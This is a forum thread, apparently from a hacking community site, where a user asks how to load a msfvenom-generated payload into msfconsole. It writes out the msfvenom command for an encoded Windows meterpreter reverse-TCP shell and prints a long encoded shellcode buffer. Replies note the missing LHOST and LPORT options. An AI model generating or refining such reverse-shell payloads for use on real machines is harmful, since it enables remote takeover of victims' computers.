Whenever I generate an encoded payload, I use the payload "-p windows/meterpreter/reverse-tcp", I save it as "-o filename.rb" with "-f ruby" and encoder "-e shikata-ga-nai", bad chars to avoid is "-b '/x00' ".
So full code is: "msfvenom -p windows/meterpreter/reverse-tcp -e shikata-ga-nai -i 3 -b '/x00' -f ruby -o filename.rb". (Note that '-' (dash) is underscore, bu it messes up my post.)
How can I use this custom ruby script as my payload in msfconsole?
Btw. The only output in the file 'filename.rb' contains the buff/bad chars.
9 Responses
Caelin:
Welcome to Null Byte!
Check out my article on installing new modules to Metasploit here.
OTW
Thanks for the link! I'll check it when I'm at home, but expect some new question(s) hahaha
Okay I have generated a payload using msfvenom, but it only contains "buf" with a lot of bad chars after it:
buf =
"\xbb\xec\xcc\xc5\xf4\xda\xdb\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x60\x31\x5a\x12\x83\xea\xfc\x03\xb6\xc2\x27\x01\x9c" +
"\x09\x1d\xbc\x84\xa1\xf7\x98\xb0\x99\x03\x42\x0b\x2b\x5a" +
"\x2a\x5a\xfb\x85\x4e\x74\x07\xb6\x00\xc6\xbe\x43\xee\x66" +
"\x61\xc5\xba\xa6\x45\x17\x6e\xea\x4e\xc3\x10\x37\x5a\xba" +
"\x66\x3a\x4c\xd3\xff\x6d\x80\x85\x6d\xf6\xfe\xa1\x25\x42" +
"\x2f\x89\xb9\x71\x15\x04\x29\xb5\x1f\x96\x05\x31\xbf\xf2" +
"\xc5\x61\x7e\xe1\xc5\x32\x07\x2f\xc3\x13\x81\x59\x7c\xb9" +
"\xed\xb4\xb7\x4e\x6a\x36\xa2\x38\x42\x54\x79\x9a\x7b\x60" +
"\x9e\xc7\x40\xd7\xc3\x00\x09\xfb\xd2\x06\x58\x7c\x81\xa4" +
"\x71\xd2\x34\x07\xb7\x17\x34\xd3\x9d\xb8\x76\xe4\xd2\x2c" +
"\x86\xe0\xfa\xc4\xba\x19\x89\x2a\xdf\x19\x1c\xc9\xff\xcb" +
"\x7a\xc5\x50\x46\x0d\x2d\xf0\x1a\x2d\x7d\xac\x32\x7c\x4a" +
"\x09\x16\x51\x5f\x37\x1e\xec\x09\x51\x57\xf5\xfc\xc5\x5f" +
"\xd4\xce\xdb\x96\x76\xcc\x9a\xd1\x38\xa1\x2f\x65\xde\x09" +
"\x17\xa3\xd8\xe0\x73\x91\xa3\xba\xba\xe4\xb1\x61\xbc\xc2" +
"\x72\x7e\xbf\xc9\x14\xad\xaa\x4a\xaa\x78\xd7\x1b\xd5\xd1" +
"\x9e\x1a\x8d\x3c\x0b\x40\xd7\x0e\x62\xfe\xc9\x61\xe2\x5c" +
"\x6c\x62\xc8\x1e\x1c\x7e\xf0\x8e\xe6\xf1\x67\x26\x66\x86" +
"\x4a\xf4\x21\xd9\x6e\x82\x1c\x35\x8f\x45\xba\x94\x96\xb6" +
"\x00\x64\xe9\x00\x22\xf2\xa1\xec\xb3\xab\x85\x05\xfd\x47" +
"\xc6\x3a\xf7\x23\x59\x2c\x4f\x0a\xf4\x40\x95\xcd\xb5\xf4" +
"\x95\x68\x90\xf8\x16\x46\xaf\x61\x4b\x17\x4f\xe5\x61\xc4" +
"\xdb\x6e\xf6\x80\x2e\xff\x32\x82\xe7\x47\xd1\xcc\x32\x7f" +
"\x97\x48\xf7\x85\x13\xb7\x4a\x7d\x10\xe0\xa0\xa8\xce\x17" +
"\x5c\xf4\x54\xaa\x60\x27\x76\x3d\x58\x4b\xd8\x4f\xc1\xce" +
"\x3d\xbb\xd9\x09\x54\xf7\x0a\x82\xaa\x84\xb7\x09\x87\x0b" +
"\x4a\x04\xc3\x7b\x3a\x06\x1e\x7d\xc2\x98\x4e\xbe\xc6\x1e" +
"\x43\x33\x48\x89\x2e\x89\x98\x2f\x73\x7b\x8a\xf4\xd9\xb5" +
"\xe1"
Maybe your custom ruby script has something missing?? Or you didnt write the command to generate payload properly... check that once.. just see all the options once that are required to be provided...
Thats all I know right now so just ignore me if you think im saying rubbish lol ;);)... anyway.. still wait for an expert!!
I think I am trying to accomplish something impossible. I'm gonna create a detailed thread about it.
Nothings impossible bro... keep on trying... ull get it right...
(Well actually not everything ;);))
not sure but did you miss some options? when you make reversetcp you should specified LHOST and LPORT .or am i wrong :)
Actuqlly ur right... with msfvenom u gotta specify those
I just want to know, is it possible to edit the apk output of msfvenom ?
Share Your Thoughts